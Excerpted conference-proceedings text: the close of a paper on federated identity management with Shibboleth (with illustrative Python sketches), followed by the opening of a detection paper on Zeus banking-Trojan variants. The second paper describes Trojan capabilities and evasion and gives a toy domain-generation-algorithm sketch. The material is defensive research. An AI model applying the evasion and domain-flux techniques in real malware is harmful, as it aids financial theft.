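        """Record the outcome of one interaction (successful or failed)."""
        if success:
            self.successes += 1
        else:
            self.failures += 1

    def trust(self) -> float:
        # Laplace smoothing: (s + 1) / (s + f + 2)
        return (self.successes + 1) / (self.successes + self.failures + 2)
```

For example, three successful interactions followed by one failure yield a trust score of (3+1)/(4+2) ≈ 0.67.<br />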
In recent years, trust has mostly been connected with and analysed in combination with technical security<br />
issues, and several definitions have been developed on this basis (Josang, Ismail and Boyd 2007; Artz<br />
and Gil 2007). For our discussion, we take a more human-centric view of trust: it relies on previous<br />
interactions and improves human collaboration supported by technical systems in a virtual environment.<br />
Here, communication is the basis for directly influencing trust between individuals in business<br />
collaborations (Economist 2008); trust relies on the experiences of previous interactions (Billhardt,<br />
Hermoso, Ossowski and Centeno 2007; Mui, Mohtashemi and Halberstadt 2002) and on the similarity of<br />
interests and skills (Matsuo and Yamamoto 2009). In addition, especially in social networks and<br />
collaborations, trust is strongly related to information disclosure, identity management and privacy, and<br />
can also be used as a basic model to improve document recommendations to better match the interests<br />
of users.<br />
Figure 1: Creation of dynamic value chains for eCollaboration<br />
This paper focuses on Federated Identity Management, which is based on trust. Fuchs and<br />
Pernul (2007) define the environment of an Identity Management system as an integrated,<br />
comprehensive framework which rests on three pillars: policies, processes and the technologies used.<br />
Identity Management processes deal with user management, organisational as well as technical<br />
approval workflows, and escalation procedures. They form the main administrative workload, as they<br />
comprise the management of the whole user lifecycle. In order to regulate identity-related<br />
information flows and processes, policies have to be defined. For example, policies express<br />
regulations for user management processes, delegation issues or general security requirements. The<br />
third pillar, technologies, can be subdivided into the following three main components:<br />
Directory services provide synchronised information about users and resources forming the<br />
foundation of a comprehensive identity management infrastructure.<br />
User management deals with the process of managing digital identities throughout their lifecycle,<br />
starting with the creation of accounts, through maintenance (e.g. processing change requests), up to<br />
deactivation or termination.<br />
Access management deals with the authentication and authorisation of users, controlling access<br />
to connected resources.<br />
2.3 Identity management architecture<br />
First of all, the term Identity Management needs to be discussed in more detail. Within the SPIKE project,<br />
two meanings of Identity Management have to be distinguished. Companies manage the digital<br />
identities of their users in their own IDM systems; this is called in-house IDM. When those identities are<br />
used in an inter-organisational manner, we speak of federated IDM. The federated IDM system of<br />
SPIKE is based on Shibboleth. Shibboleth is needed to make use of the digital identities in an inter-organisational<br />
context, i.e. the identity information of User A from Company A is used to access<br />
Resource X managed by Company Y. Shibboleth mainly consists of three components: the Where<br />
Are You From service (WAYF), the Shibboleth Service Provider (Shib SP) and the Shibboleth Identity<br />
Provider (Shib IdP).<br />
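The interplay of the three components can be illustrated by a deliberately simplified simulation of the<br />
access flow: the service provider asks the WAYF for the user’s home IdP, the IdP authenticates the user<br />
and releases only the agreed attributes, and the service provider authorises locally. All class, method and<br />
attribute names below are illustrative stand-ins; real Shibboleth exchanges SAML assertions over HTTP:<br />

```python
# Illustrative simulation of the Shibboleth access flow described above.
# Class and attribute names are hypothetical, not the actual Shibboleth API.

class IdentityProvider:
    def __init__(self, org, users):
        self.org = org
        self._users = users  # username -> {"password": ..., "role": ...}

    def authenticate(self, username, password):
        """Authenticate locally; on success release only agreed attributes."""
        user = self._users.get(username)
        if user and user["password"] == password:
            return {"org": self.org, "principal": username, "role": user["role"]}
        return None

class WAYF:
    """'Where Are You From' service: maps a home organisation to its IdP."""
    def __init__(self):
        self._idps = {}

    def register(self, idp):
        self._idps[idp.org] = idp

    def lookup(self, org):
        return self._idps[org]

class ServiceProvider:
    def __init__(self, wayf, required_role):
        self.wayf = wayf
        self.required_role = required_role

    def access(self, org, username, password):
        idp = self.wayf.lookup(org)                       # 1. discover home IdP
        assertion = idp.authenticate(username, password)  # 2. authenticate there
        # 3. authorise locally based on the asserted attributes
        return assertion is not None and assertion["role"] == self.required_role
```

In this sketch the service provider never sees the user's password, only the attributes asserted by the<br />
home identity provider, which mirrors the division of responsibilities described in the text.<br />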
SPIKE requires connecting to an existing IDM system of the collaborating companies. Thereby, the<br />
already existing digital identities can be used in an inter-organisational manner. However, the SPIKE<br />
project targets organisations of all sizes, from small and medium-sized enterprises to large<br />
organisations. Large organisations and many medium-sized companies usually run their own IDM<br />
systems, but small companies, and sometimes medium-sized ones as well, do not operate an IDM system.<br />
Therefore, SPIKE must distinguish between these two cases (companies without an IDMS and<br />
companies with an IDMS).<br />
Figure 2 shows the generic Identity Management architecture of SPIKE. The figure is reduced to the IDM-relevant<br />
components to describe the basic idea of SPIKE’s IDM. SPIKE considers both cases – companies<br />
running their own IDM solutions as well as enterprises without an IDM system.<br />
Figure 2: SPIKE IDM architecture<br />
In Figure 2, Company A represents a small enterprise employing only a handful of<br />
persons. Such a company might not have the comprehensive IDM system which is required to participate<br />
in virtual alliances operated by SPIKE. To enable such companies to take part in an online<br />
collaboration, SPIKE runs its own IDM solution and thereby fills this gap. For this purpose, the<br />
SPIKE platform has its own Shibboleth IdP installed, which is connected with SPIKE’s IDM solution.<br />
The SPIKE Shibboleth IdP is registered with the SPIKE WAYF service. The IDMS of SPIKE can be<br />
accessed via the SPIKE portal.<br />
Company B, on the other hand, represents all enterprises running their own IDM systems. Those<br />
companies have to install and configure the Shibboleth IdP software on the IT systems within their<br />
company and connect their IDM solution appropriately. Furthermore, the Shib IdPs have to be<br />
registered and connected with the SPIKE WAYF service. Such companies do not need SPIKE’s<br />
IDMS.<br />
In the following, two sequence diagrams show, at a high level, the general procedure for connecting an external IDMS<br />
to SPIKE as well as for making use of SPIKE’s integrated IDM solution. The<br />
diagrams shown are reduced to the IDM-related steps.<br />
Figure 3 represents the high-level procedure for connecting an external IDMS with the SPIKE<br />
platform. First, an administrator of the collaborating company has to install and configure the<br />
Shibboleth IdP software (1). After that, a connection between the company’s IDMS and the Shibboleth<br />
IdP needs to be set up by registering the IDMS (2). According to the attributes required by SPIKE and<br />
the respective resources provided by the alliance partners, the administrator of the company can<br />
assign attributes to the involved digital identities (3). The attributes required to access a resource<br />
provided by a service provider are defined during the configuration phase of the SP [D7.2b]. After the<br />
project has finished, all connections are disabled and the Shibboleth IdP is uninstalled (4).<br />
Figure 3: Connecting external IDMS with SPIKE<br />
Figure 4 shows a high-level procedure for using SPIKE’s IDMS.<br />
Figure 4: Using SPIKE IDM system<br />
In order to make use of SPIKE’s IDMS, the SPIKE administrator first has to create a respective user<br />
account, equipped with sufficient access rights and attributes, for the responsible user of the particular<br />
company (1). The administrator of company N then establishes the needed digital identities in the IDMS of<br />
SPIKE. Attributes are assigned according to the attributes required by SPIKE and the<br />
resources provided by the partners. When an employee leaves the project or the company, or the<br />
project ends, the company’s admin destroys those digital identities (2). In the third step, the<br />
SPIKE administrator deletes the admin account of the respective company after the collaboration<br />
project has finished (3).<br />
By means of the IDM solutions – either the companies’ own IDM or SPIKE’s IDM – the collaboration<br />
partners can manage their users and the respective attributes by themselves and thereby follow the<br />
paradigm of federated identity management.<br />
2.4 Evaluation of the applicability of potential solutions for identity management<br />
architecture<br />
In this section, a brief introduction to the applicability of potential solutions is given, in which<br />
two potential solutions, Apache DS and OpenLDAP, are compared and evaluated against the<br />
requirements defined in section 2.2:<br />
Table 1 shows a comparison between Apache DS and OpenLDAP based on the requirements for<br />
SPIKE’s integrated IDMS defined in section 2. Both solutions fulfill the defined requirements if<br />
respective admin GUIs are used in addition. However, during the test phase we also recognized<br />
some minor differences, leading to the decision described in the following.<br />
Table 1: Comparison between Apache Directory Server and OpenLDAP<br />
Identity Management processes mainly deal with user management and security policies. Apache<br />
Directory Server in conjunction with its corresponding administration tool Apache Directory Studio<br />
offers the possibility to create, delete, and change user accounts and attributes. Thus, users can be<br />
administered via Apache Directory Studio. Apache DS itself does not provide an admin GUI by<br />
default. Apache DS also covers the three main components of technologies: directory services, user<br />
management and access management. Furthermore, it is possible to monitor and log all carried-out<br />
actions in order to comply with any kind of legal obligation or regulation. Apache DS also enables the<br />
definition and application of policies. For instance, policies for the quality of a user password, in terms<br />
of string length, the usage of special characters, etc., can be defined.<br />
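Such a password-quality policy can be expressed, in plain Python rather than in Apache DS’s actual<br />
configuration syntax, roughly as follows (the thresholds are illustrative defaults, not values shipped with<br />
Apache DS):<br />

```python
import re

def check_password_policy(password, min_length=8, require_special=True):
    """Check a password against a simple quality policy: a minimum string
    length and, optionally, at least one special (non-alphanumeric) character.
    Illustrative defaults, not an actual Apache DS policy."""
    if len(password) < min_length:
        return False
    if require_special and not re.search(r"[^A-Za-z0-9]", password):
        return False
    return True
```

In a directory server, such a policy is enforced centrally at account creation and password change, so<br />
every connected application inherits the same rules.<br />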
Summarizing, both Apache DS and OpenLDAP fulfill all defined requirements, support auditing<br />
functionality, and require a separate tool for administration.<br />
In the following, a special application case is presented, and we start with a discussion of the<br />
user requirements.<br />
3. Application case identity federations<br />
3.1 User requirements<br />
Prior to the introduction of the Identity Management System (IDMS) in 2005, access information for<br />
file shares, computers and accounts was distributed across several systems such as Active Directory, SunOne<br />
and other applications. Those systems worked independently, and there was no mechanism available<br />
to guarantee consistent data (e.g. departments, cost centers, phone numbers and names of persons),<br />
based on delivery from designated master systems, throughout the different systems deployed in<br />
the company. Thus, helpdesk support was required frequently.<br />
Therefore, Infineon introduced the IDMS to have a mechanism at hand to collect data from different<br />
master systems, combine the necessary data into digital identities, and distribute and enforce this<br />
identity information consistently throughout different directory services and applications. In order to<br />
improve the IDMS and to secure the ROI, an automatic user provisioning system and RBAC have to be<br />
set up in a next step.<br />
The major function of provisioning is the following: once a new identity enters the IDMS from the global HR system,<br />
an automatic workflow is triggered and routed to its manager based on certain attributes (such as location and<br />
manager information). The respective manager chooses the appropriate roles for the new employee,<br />
and depending on the request, the necessary access to resources (accounts, groups, group<br />
memberships) is set up by the IDMS (mostly, no human interaction is necessary anymore). Thus, during<br />
the life cycle of the identity, roles are added and removed, and once an employee leaves the company,<br />
access to his resources is disabled completely. The last case is also called de-provisioning. A<br />
basic approach to provisioning (without a portal and workflow solution) was developed and<br />
implemented at Infineon in 2007. The results are shown in (Obiltschnig 2007).<br />
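The provisioning life cycle sketched above can be illustrated as follows; the role names, resource sets<br />
and workflow routing are invented for illustration and do not reflect Infineon’s actual systems:<br />

```python
# Hypothetical sketch of the provisioning/de-provisioning flow described
# above. Role names, resource sets and workflow routing are illustrative.

ROLE_RESOURCES = {
    "chip_designer": {"design_share", "eda_tools_group"},
    "it_admin": {"admin_portal", "server_group"},
}

class ProvisioningIDMS:
    def __init__(self):
        # user -> {"manager": ..., "roles": set, "resources": set}
        self.identities = {}

    def hr_entry(self, user, manager):
        """A new identity arrives from the global HR system; the approval
        workflow is routed to the responsible manager."""
        self.identities[user] = {"manager": manager,
                                 "roles": set(), "resources": set()}
        return manager

    def assign_role(self, user, role):
        """The manager picks a role; resource access is granted automatically."""
        entry = self.identities[user]
        entry["roles"].add(role)
        entry["resources"] |= ROLE_RESOURCES[role]

    def deprovision(self, user):
        """The employee leaves the company: all access is disabled."""
        entry = self.identities[user]
        entry["roles"].clear()
        entry["resources"].clear()
```

The point of the role indirection is that access follows from the role choice alone, so, as stated above,<br />
mostly no further human interaction is necessary once the manager has approved the request.<br />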
Another issue which cannot be tackled exclusively by a centrally organized IDMS is collaboration<br />
with external partners. This topic has been researched in depth for more than two decades:<br />
having started in the mid-1980s, research in this area is still ongoing. Well-known and representative<br />
terms used for enterprise collaboration (alliances) are Virtual Organizations (Skyrme 2007),<br />
Networked Organizations (Lipnack and Stamps 1994) and Collaborative Innovation Networks [GL06].<br />
The so-called Virtual Team represents another well-known expression on the micro level (Lipnack<br />
and Stamps 1997).<br />
The common essence of the mentioned concepts can be summarized by the following aspects (Lipnack<br />
and Stamps 1997):<br />
Independent people and groups act as independent nodes in a network,<br />
are linked across conventional boundaries (e.g. departments and geographies),<br />
and work together for a common purpose.<br />
A collaboration has multiple leaders, many voluntary links and interacting levels,<br />
is based on mutual responsibility, i.e. there is no hierarchical management structure but the<br />
involved individuals act as equal partners,<br />
and teams are readjusted or disbanded as needed.<br />
A successful collaboration requires the fulfillment of the following principles (Skyrme 2007):<br />
Each partner must contribute some distinctive added value to the cooperation.<br />
Members must develop a high degree of mutual trust and understanding. Thus, similar groups or<br />
even the same people will work together again and again.<br />
Projects or whole services should be the focus of the cooperation.<br />
In the run-up to a collaboration, one has to define general rules of engagement in terms of inputs<br />
to the cooperation and rewards expected, though momentum is lost if these are formalized<br />
too soon.<br />
Members of the cooperation should recognize the need for coordination roles and either commit<br />
time to develop and nurture these roles or pay one of the members to undertake the coordination<br />
on their behalf.<br />
A clear interface needs to be developed with non-virtual customers – they like tidy relationships<br />
and clear contracts. Thus, either one member of the virtual cooperation must act on behalf of the<br />
others (using them as subcontractors), or a joint company must be created to act as their legal entity and<br />
administration service.<br />
The highly dynamic business environment forces Infineon to set up strategic alliances (project partnerships)<br />
frequently in order to remain competitive in cost and time. The chip design process and the production<br />
environment (silicon foundries) serve as good examples of necessary alliances. While partnerships in<br />
the course of chip design aim at reducing the time to market, alliances during production focus<br />
on covering customer demands by increasing the available production capacities. Especially the<br />
design process for very complex chips sometimes requires setting up an alliance with one or more<br />
competitors to reduce the overall development costs of the chip. For the automotive industry (one of<br />
our three business areas), highly complex special-function chips are designed. The business strategy of<br />
Infineon also includes cooperation in terms of an alliance with a customer to develop “next<br />
generation” chips which represent a quantum leap in technology and/or function (Schmelmer 2008).<br />
Today, a complex process for the setup of collaborations exists (see Figure 5).<br />
The process starts with an internal employee requesting an identity entry in the IDMS for the external<br />
persons belonging to the other organisations of the business alliance. The following phases include the<br />
provisioning of resources and the revocation of access to the respective resources once<br />
the alliance ends. This process is applied for each (strategic) alliance in which external staff is<br />
involved.<br />
However, this approach requires an internal employee at Infineon to trigger numerous steps before an<br />
external alliance partner is able to start performing his tasks. Many individual resources have to be<br />
provisioned for the external partners (there is currently no role model and no suitable tooling available),<br />
accompanied by many approval workflows, which slows down the whole setup process. Furthermore,<br />
knowledge about external employees, e.g. which resources they need to access at Infineon, is<br />
necessary in advance (reducing flexibility). Moreover, today the whole identity information of<br />
external persons is also kept in the IDMS, which inflates the data volume.<br />
To overcome these deficiencies, the approach of Federated Identity Management (also called identity<br />
federation) was established; its core idea is to allow individuals to use the same accounts and passwords they<br />
have in their own company to get access to the network of another company.<br />
First, a user’s identity data is maintained by an identity provider in its IDMS. In the context of SPIKE,<br />
the partner company of INF takes over the role of the identity provider, while INF acts as service<br />
provider during this collaboration. Subsequently, the user tries to access a service (an application, a<br />
data source, and so on) of the service provider. Thereby, the user is verified at the identity provider<br />
(the collaboration partner) by the service provider (INF). If the identity provider successfully<br />
authenticates the user (or, in SPIKE terminology, fulfils the tasks which were negotiated in the<br />
collaboration contract), the user is granted access to the requested service.<br />
Business partners trust each other's user authentication mechanisms and also<br />
guarantee that only authenticated users will have access to the services (resources,<br />
applications) of the alliance partner. This is a precondition for companies to use applications in a<br />
common way without being forced to use the same directory services and authentication mechanisms,<br />
or to duplicate digital identities into the other system.<br />
Federated Identity Management also reduces the administration overhead in an alliance, because the<br />
collaboration partner is not required to know in advance which employees need access to<br />
the resources of the alliance partner. The identity provider also has great flexibility to<br />
manage (exchange, increase, decrease) its staff during the lifetime of the alliance according to the<br />
needs of the service provider. The service provider only has to take care of access to the applications<br />
needed by both companies (e.g. design applications in the chip design area or administration<br />
applications in the IT area, and so on).<br />
In the next sections, the requirements for the SPIKE/IF component (identity federation module) within a life<br />
cycle model for collaborations are described in order to overcome the deficiencies mentioned above.<br />
Figure 5: Creation process for external collaboration partners<br />
3.2 Description of the requirements for connecting to external IDM<br />
Federated Identity Management enables the usage of digital identities in an inter-organisational way.<br />
This means that users can apply their local digital identity at their home company in order to access<br />
shared resources within collaborations. A fundamental precondition is the administration of digital<br />
identities in an IDMS which needs to be connected with SPIKE. For organisations willing to participate<br />
in collaborations operated by SPIKE, we identified some technical requirements which must be fulfilled<br />
and which are presented in the next section:<br />
3.2.1 Overview<br />
The SPIKE Identity Federation Module (SPIKE/IF for short) is the building block in the architecture (see<br />
Figure 6) for setting up collaborations between companies, defining roles and resource bundles, and<br />
managing the access of federated identities during a collaboration.<br />
Figure 6 shows the collaboration model. Before a company can take part in any collaboration,<br />
the phase “collaboration setup” has to be passed. This phase describes the tasks of a company’s<br />
administrator in providing the required resources. The most basic resource to be provided is the<br />
network configuration.<br />
Figure 6: Identity federation life cycle model<br />
3.2.2 Setting up a collaboration<br />
In our project, different types of collaboration are possible, depending on who carries out the<br />
service provider function in the collaboration.<br />
A design principle is that users of a company can only be assigned to services of a partner company by the<br />
responsible persons of their own company (for security, reduced complexity and retained flexibility). Only the hub<br />
company can extend a collaboration with additional partner companies (a security aspect). In the<br />
following, the setting up of a collaboration is visualized.<br />
Unfortunately, collaborative applications nowadays commonly use centralized infrastructures. The use<br />
of such systems has generated huge interest in decentralized systems, so in our case different<br />
types of collaboration are possible, depending on who is carrying out the service provider function in the<br />
collaboration. In the following, the centralized collaboration is presented (Figure 8):<br />
Figure 7: Steps to set up a collaboration<br />
Figure 8: Centralized collaboration<br />
In the case of a centralized collaboration, only the hub company offers services, which are accessed by<br />
partners. The partner companies only act as identity providers for their federated users. This type of<br />
collaboration mostly appears when only one large company is involved, offering a large service<br />
and application landscape with complex business processes supported by workflow management<br />
systems, and when the partners are mostly smaller companies without their own service infrastructure but<br />
with specialized and/or cost-efficient employees who take over whole outsourced services of the hub<br />
company.<br />
In the case of a decentralized collaboration (see Figure 9), all partners offer services in the<br />
collaboration and act as service providers which are accessed mutually. All partners act as identity<br />
providers for their federated users. This type of collaboration often appears when one or more large<br />
companies are involved which offer a large service and application landscape with complex business<br />
processes supported by workflow management systems whose workflows include the involvement<br />
of highly specialized partner companies, or when the partners are companies with few but highly<br />
specialized services which can be offered cost-efficiently.<br />
Figure 9: Decentralized collaboration<br />
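The difference between the two topologies can be summarized in a few lines: in both cases every<br />
partner acts as identity provider for its own federated users, and only the set of service providers differs.<br />
A minimal sketch, with function and parameter names of our own choosing:<br />

```python
def collaboration_roles(partners, hub, decentralized):
    """Return (identity_providers, service_providers) for a collaboration.

    In both topologies every partner acts as identity provider for its own
    federated users; in a centralized collaboration only the hub company
    offers services, while in a decentralized one all partners do.
    """
    identity_providers = set(partners)
    service_providers = set(partners) if decentralized else {hub}
    return identity_providers, service_providers
```
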
3.2.3 Role and resource management<br />
Modeling roles is a research topic with a long history. There are many approaches (Ferraiolo, Kuhn<br />
and Chandramouli 2003), which are more or less successful. They can be classified according to three<br />
different strategies:<br />
Top-down approaches are based on the analysis of business processes and organizational structures;<br />
bottom-up approaches try to analyze existing permissions throughout different systems and<br />
aggregate similar patterns (clusters) into roles;<br />
hybrid approaches combine both strategies.<br />
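As a deliberately simplified illustration of the bottom-up strategy, the following sketch aggregates users<br />
with identical permission sets into candidate roles; real role-mining algorithms also cluster merely<br />
similar permission patterns:<br />

```python
from collections import defaultdict

def mine_roles(user_permissions):
    """Bottom-up role mining sketch: group users whose permission sets are
    identical and propose each group as a candidate role."""
    clusters = defaultdict(set)
    for user, perms in user_permissions.items():
        clusters[frozenset(perms)].add(user)
    # Each cluster of users sharing one permission set becomes a candidate role.
    return [{"permissions": set(perms), "members": members}
            for perms, members in clusters.items()]
```
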
The necessary steps during resource and role management are modelled in Figure 10.<br />
Figure 10: Steps during role and resource management<br />
4. Conclusions<br />
In this paper, the architecture of the SPIKE IDMS was presented, and it was shown how it can be integrated<br />
with an IdP. The SPIKE IDMS is intended to serve mainly SMEs which do not own a<br />
proprietary IDMS and therefore need this extra tool when a collaboration within SPIKE is started. In<br />
doing so, we improve the opportunities of SMEs in a globalising world.<br />
References<br />
Artz, D. and Gil, Y. (2007) “A survey of trust in computer science and the semantic web”, Journal of Web<br />
Semantics, Vol 5, No. 2, pp 58-71.<br />
Billhardt, H., Hermoso, R., Ossowski, S. and Centeno, R. (2007) “Trust-based service provider selection in open<br />
environments”, ACM Symposium on Applied Computing (SAC), pp 1375-1380.<br />
Davenport, T.H. and Prusak, L. (1998) Working Knowledge: How Organizations Manage What they know,<br />
Harvard Business School Press, Boston MA.<br />
Ferraiolo, D.F., Kuhn, R.D. and Chandramouli, R. (2003) Role-Based Access Control, Artech House.<br />
Economist (2008) “The role of trust in business collaboration. An Economist Intelligence Unit”, Cisco Systems,<br />
Vol 10, No. 70.<br />
Fuchs, L. and Pernul, G. (2007) “Supporting Compliant and Secure User Handling – A Structured Approach for<br />
In-House Identity Management”, The Second International Conference on Availability, Reliability and<br />
Security (ARES 2007), IEEE Computer Society, Los Alamitos, pp 374–384.<br />
Jackson, G. (2010) “Identity and Access Management”, [online], The University of Chicago, Overview paper,<br />
www.internet2.edu/pubs/200703-ISMW.pdf.<br />
Josang, A., Ismail, R. and Boyd, C. (2007) “A survey of trust and reputation systems for online service provision”,<br />
Decision Support Systems, Vol 43, No. 2, pp 618-644.<br />
Klein, R., Rai, A. and Straub, D.W. (2007) “Competitive and cooperative positioning in supply chain logistics<br />
relationship”, Decision Sciences, Vol 38, No. 4, pp 611-646.<br />
Lipnack, J. and Stamps, J. (1994) The Age of the Network – Organizing Principles for the 21st Century, John<br />
Wiley & Sons.<br />
Lipnack, J. and Stamps, J. (1997) Virtual Teams – Reaching across space, time and organizations with<br />
technology, John Wiley & Sons.<br />
Matsuo, Y. and Yamamoto, H. (2009) “Community gravity: Measuring bidirectional effects by trust and rating on<br />
online social network”, International World Wide Web Conference (WWW), pp 751-760.<br />
Mohrman, S. A., Finegold, D. and Mohrman, A. M. (2003) “An empirical model of the organization knowledge<br />
system in new product development firms”, Journal of Engineering Technology Management, Vol 20, No. 1,<br />
pp 7-38.<br />
Mori, J., Sugiyaman, T. and Matsuo, Y. (2005) “Real-world oriented information sharing using social networks”,<br />
Group, pp 81-85.<br />
Mui, L., Mohtashemi, M. and Halberstadt, A. (2002) “A computational model of trust and reputation for e-<br />
Business”, Hawaii International Conferences on Systems Sciences (HICSS), p 188.<br />
Obiltschnig, A. (2007) Role-based Provisioning – Ein praktischer Ansatz im Identity Management, Institute for<br />
Applied Computer Science, Faculty for Technical Sciences, University of Klagenfurt, Klagenfurt.<br />
Schmelmer M. (2008) “Infineon setzt bei IT auf Einsparungen”, [online],<br />
www.cio.de/strategien/methoden/850789/index.html.<br />
Semmelrock-Picej, M.Th. and Possegger, A. (2010) “Ausgewählte Sicherheitsrelevante Aspekte der<br />
eCollaboration”, D-A-CH Security 2010, pp 314-325.<br />
Skyrme, D. (2007) „Insights“, [online], www.skyrme.com/insights/.<br />
Zack, M.M. (1999) “Managing codified knowledge”, Sloan Management Review, Vol 40, No. 4, pp 45-58.<br />
Ziener, K. (2010) Grenzüberschreitende Wirtschaftskooperationen und Interreg III A Projekte, Klagenfurt 2010.<br />
251
Anatomy of Banking Trojans – Zeus Crimeware (How Similar are its Variants)<br />
Madhu Shankarapani and Srinivas Mukkamala<br />
(ICASA)/(CAaNES)/New Mexico Institute of Mining and Technology, USA<br />
madhuk@cs.nmt.edu<br />
srinivas@cs.nmt.edu<br />
Abstract: Adding to the complexity of existing cyber threats, targeted Crimeware that steals personal information for financial gain is for sale for as little as $700.<br />
Banking Trojans have been notoriously difficult to kill, and to date most antivirus and security technologies fail to detect them or prevent them from causing havoc.<br />
Zeus, considered one of the most nefarious financial and banking Trojans, targets businesses and financial institutions to perform unauthorized automated clearing house (ACH) and wire transfer transactions for check and payment processing.<br />
Zeus is causing billions of dollars in losses and is facilitating identity theft of innocent users for financial gain. Zeus Crimeware does one thing very well that every security researcher envies – obfuscation.<br />
The Zeus kit conceals the exploit code every time a binary is created: an inbuilt binary generator produces, on every use, a new binary file that is radically different from the others, which evades detection by antivirus or security technologies that rely on signature-based detection.<br />
The effectiveness of an up-to-date antivirus against Zeus is thus not 100%, not 90%, not even 50% – it is just 23%, which is alarming.<br />
No matter how smart and how different Zeus binaries are, most of them share a few common behavioral patterns, such as the ability to take screenshots of a victim's machine or control it remotely, to hijack e-banking sessions and log them to the level of impersonation, to add additional pages to a website and monitor them, or to steal passwords stored by popular programs and use them.<br />
In this paper we present detection algorithms that can help the antivirus community ensure that a variant of a known malware can still be detected without the need to create a signature; a similarity analysis (based on specific quantitative measures) is performed to produce a matrix of similarity scores that can be utilized to determine the likelihood that a piece of code or binary under inspection contains a particular malware.<br />
The hypothesis is that all versions of the same malware family, or of similar malware families, share a common core signature that is a combination of several features of the code (binary).<br />
Results from our recent experiments on 40 different variants of Zeus show very high similarity scores (over 85%). Interestingly, Zeus variants also have high similarity scores with other banking Trojans (Torpig, Bugat, and Clampi) and with a well-known data-stealing Trojan, Qakbot.<br />
We present experimental results indicating that our proposed techniques can provide better detection performance against banking Trojans like Zeus Crimeware.<br />
Keywords: Zeus Crimeware, banking Trojans, Torpig, Bugat, Clampi, malware similarity analysis, anatomy of<br />
Zeus, malware analytics<br />
1. Introduction<br />
One of the major concerns in network security is controlling the spread of malware over the Internet.<br />
In particular, polymorphic and metamorphic versions of malware are the most troublesome among malware families, because of their capability not only to infect systems but also to steal confidential user data and to persist.<br />
These kinds of malware are written with the intent of taking control of a large number of hosts on the Internet. Once hosts are infected by Trojans, they may join a botnet for stealing personal data such as user credentials (Holz, Engelberth and Freiling, 2008), (Kanich et al, 2008).<br />
Over time, malware writing has changed from being done for fun to the present day, where it is done for financial gain.<br />
Trojans in the past were used for sending spam emails, installing third-party malware, keystroke logging, crashing the host machine, and uploading or downloading files on infected machines.<br />
Present-generation Trojans are far more complex: when a Trojan notices the user visiting the website of a targeted bank, it springs into action. When the user is carrying out a transaction, the Trojan looks at the available balance and calculates how much money to steal.<br />
These Trojans are given upper and lower bound limits that stay below the amounts that trigger antifraud systems.<br />
Zeus, Torpig, Zlob, Vundo, and SmitFraud are a few examples of deadly Trojans that have caused major financial loss.<br />
Torpig is a malware program that was developed to steal sensitive information from its infected hosts.<br />
In early 2005 over 180 thousand machines were infected, and about 70 GB of data were stolen and uploaded to the bot-masters (Stone-Gross et al, 2009), (Nichols, 2009).<br />
Torpig depends on domain flux to locate its main C&C servers, and on those servers to perform drive-by downloads that spread it across a network.<br />
Using JavaScript, it generates pseudo-random domain names on-the-fly and redirects victims to a malicious webpage.<br />
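The domain-flux behavior described above can be sketched as a toy domain-generation algorithm (DGA). This is an illustrative sketch only – it is not Torpig's actual algorithm, and the seed handling and `.com` suffix are assumptions made for the example:<br />

```python
import hashlib

def generate_domains(seed: str, week: int, count: int = 3) -> list:
    """Toy DGA: the bot and its master derive the same pseudo-random
    rendezvous domains from a shared seed and the current week number.
    NOT Torpig's real algorithm - for illustration only."""
    domains = []
    for i in range(count):
        digest = hashlib.md5(("%s-%d-%d" % (seed, week, i)).encode()).hexdigest()
        domains.append(digest[:12] + ".com")  # hypothetical TLD choice
    return domains
```

Because the output depends only on the shared seed and the date, the bot-master can register next week's domains in advance, while defenders must predict and block them faster.<br />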
Vundo, also known as VirtuMundo, VirtuMonde, and MS Juan, spreads via email, peer-to-peer file sharing, and other malware (Bell and Chien, 2010).<br />
It exploits browser vulnerabilities, displays pop-up advertisements, and has the capability to inject advertisements into search results.<br />
Fraudulent or misleading applications, intrusive pop-ups, and fake scan results are characteristic of this Trojan.<br />
Vundo lowers security settings, prevents access to certain websites, and also disables antivirus programs, making it all the more difficult to remove.<br />
Its newer variants are far more sophisticated in their payloads and functionality; they can exploit vulnerabilities to download misleading software and extensions that encrypt files in order to extort money from the user.<br />
Zeus is a Trojan horse that steals banking information from infected machines and spreads through drive-by downloads and phishing emails.<br />
Since the date it was first identified, Zeus has been very active in the wild, with a constant increase in the threat it poses.<br />
Most threatening of all is the large group working on Zeus to create an enormous number of Zeus/Zbot variant builders, whose output can evade present anti-virus software.<br />
The problem is so critical that a significant research effort has been invested in gaining a better understanding of these malware characteristics.<br />
One approach to studying them is to perform passive analysis of the secondary effects caused by the activities of compromised hosts.<br />
Many researchers have performed passive analyses such as collecting spam emails that are likely to have been sent by bots (Zhuang et al, 2008), observing DNS queries (Rajab et al, 2007), (Rajab et al, 2006) or DNS blacklist queries (Ramachandran, Feamster and Dagon, 2006) performed by bot-infected machines, and analyzing network traffic for cues that are characteristic of certain botnets (Karasaridis, Rexroad and Hoeflin, 2007).<br />
While these analyses provide interesting insights into particular characteristics of Trojans and bots, the approach is limited to those botnets that actually exhibit the activity targeted by the analysis.<br />
Active approaches analyze botnets through infiltration: researchers join the botnet to perform the analysis. Usually honeypots or spam traps are used to collect a copy of a malware sample.<br />
The obtained samples are then executed in a controlled environment and their behavior is observed.<br />
Observations include the traffic exchanged between bots and their command and control server(s) and the IP addresses of other clients concurrently logged into the IRC channel (Rajab et al, 2006), (Cooke, Jahanian and McPherson, 2006), (Freiling, Holz and Wicherski, 2005).<br />
Unfortunately, these techniques do not work on botnets that use stripped-down IRC or HTTP servers as their C&C channels.<br />
Present anti-virus techniques are based either on signature-based detection, which is not effective against polymorphic and unknown malware, or on heuristic-based algorithms, which are inefficient and inaccurate.<br />
Detection based on string signatures uses a database of regular expressions and a string-matching engine to scan files and detect infected ones; each regular expression in the database is designed to identify a known malicious program.<br />
Though traditional signature-based malware detection methods have existed for ages, there is much room to improve signature-based detection, and a few data mining and machine learning techniques have been proposed to detect new malware.<br />
(Westfeld, 2001: 289-302), (Sallee, 2005: 167-189) and (Solanki, Sarkar and Manjunath, 2007: 16-31) examined the performance of various classifiers such as Naïve Bayes and support vector machines (SVM), plotting ROC curves using decision tree methods.<br />
(Lyu and Farid, 2002: 340-354) applied Objective-Oriented Association (OOA) mining based classification (Fridrich, 2004: 67-81), (Shi, Chen and Chen, 2006) to Windows API execution sequences called by PE files. A few of these methods rely entirely on the occurrence of API execution sequences.<br />
There are also methods in which websites are crawled to inspect whether they host any kind of malicious executable (Pevny, Fridrich, 2007); such studies generally target web server security, advertising, and third-party widgets, and their basic approach shows how malware executables are often distributed across a large number of URLs and domains.<br />
